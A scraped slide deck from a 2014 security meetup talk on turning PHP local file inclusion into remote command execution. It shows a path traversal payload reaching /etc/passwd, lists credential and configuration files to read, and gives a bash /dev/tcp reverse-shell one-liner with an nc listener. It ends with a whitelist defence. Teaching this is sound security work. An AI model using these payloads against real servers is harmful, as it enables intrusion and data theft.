Local File Inclusion To Remote
Command Execution [LFI <> RCE]
By
Sharath Unni
Introduction
 What is a file inclusion vulnerability?
 How the attack works?
 RFI/LFI vulnerable PHP functions
 Traver...
What is a file inclusion vulnerability?
 Input validation
 The application trusts/doesn’t validate the user input
 The ...
How the attack works?
http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include
The code would be:
<?php $file =$_GET[‘...
RFI/LFI vulnerable PHP functions
include()
include_once()
require()
require_once()
fopen()
Common locations
 Normally, the following files are read:
/etc/passwd
/etc/group
/etc/security/passwd
/etc/security/user
...
Path Traversal / FI using scanners
http://sectooladdict.blogspot.in/ OR http://sectoolmarket.com/
We read the files,
what next?
Reverse shell via LFI
 PHP script to open an outbound TCP connection
<?php exec("bash -i >& /dev/tcp/<yourIP>/<port> 0>&1...
Other ways to inject your code
 Using directory traversal to read files
 Log poisoning (access.log, error.log)
 Session...
Defending yourself
 <?php
 $page_files=array( 'about'=>'about.html',
 'photos'=>'photos.html',
 'contact'=>'contact.ht...
Thank You! 
References
 http://sectoolmarket.com/path-traversal-local-file-
inclusion-detection-accuracy-of-open-source-web-
applicat...
Upcoming SlideShare
Loading in...5
×

Local File Inclusion to Remote Code Execution

2,034

Published on

null Bangalore Chapter - March 2014 Meet

Published in: Education
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,034
On Slideshare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
49
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Local File Inclusion to Remote Code Execution

  1. 1. Local File Inclusion To Remote Command Execution [LFI <> RCE] By Sharath Unni
  2. 2. Introduction  What is a file inclusion vulnerability?  How the attack works?  RFI/LFI vulnerable PHP functions  Traverse and read local files  PathTraversal / FI using scanners  Reverse shell via LFI  Other ways to inject your code  Defending yourself
  3. 3. What is a file inclusion vulnerability?  Input validation  The application trusts/doesn’t validate the user input  The code includes/imports other pages  Dynamic including of the page  When PHP includes a file it will parse any PHP code within that file (“<?php” and “?>”) Do not trust the user…ever !!
  4. 4. How the attack works? http://192.168.109.136/dvwa/vulnerabilities/fi/?page=include The code would be: <?php $file =$_GET[‘file']; include("/".$file .".php"); <--Vulnerable !! ?>  Assign page to "../../../../etc/passwd%00“ <?php $file =$_GET[‘file']; include("/../../../../etc/passwd%00.php"); <-- Directory Traversal to LFI ?> %00 (Null CHAR) will ignore everything that comes after %00 ../../../ will traverse path to root and goto /etc/passwd
  5. 5. RFI/LFI vulnerable PHP functions include() include_once() require() require_once() fopen()
  6. 6. Common locations  Normally, the following files are read: /etc/passwd /etc/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/httpd/conf/httpd.conf  Other Unix common locations
  7. 7. Path Traversal / FI using scanners http://sectooladdict.blogspot.in/ OR http://sectoolmarket.com/
  8. 8. We read the files, what next?
  9. 9. Reverse shell via LFI  PHP script to open an outbound TCP connection <?php exec("bash -i >& /dev/tcp/<yourIP>/<port> 0>&1"); ?>  Go and catch the reverse shell nc –lp <port>
  10. 10. Other ways to inject your code  Using directory traversal to read files  Log poisoning (access.log, error.log)  Session variables  Uploaded files  Emails  Shared hosting  FTP and other logs
  11. 11. Defending yourself  <?php  $page_files=array( 'about'=>'about.html',  'photos'=>'photos.html',  'contact'=>'contact.html',  'home'=>'home.html'  );   if (in_array($_GET['page'],array_keys($page_files))) {  include $page_files[$_GET['page']];  } else {  include $page_files['home'];  }  ?>
  12. 12. Thank You! 
  13. 13. References  http://sectoolmarket.com/path-traversal-local-file- inclusion-detection-accuracy-of-open-source-web- application-scanners.html
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×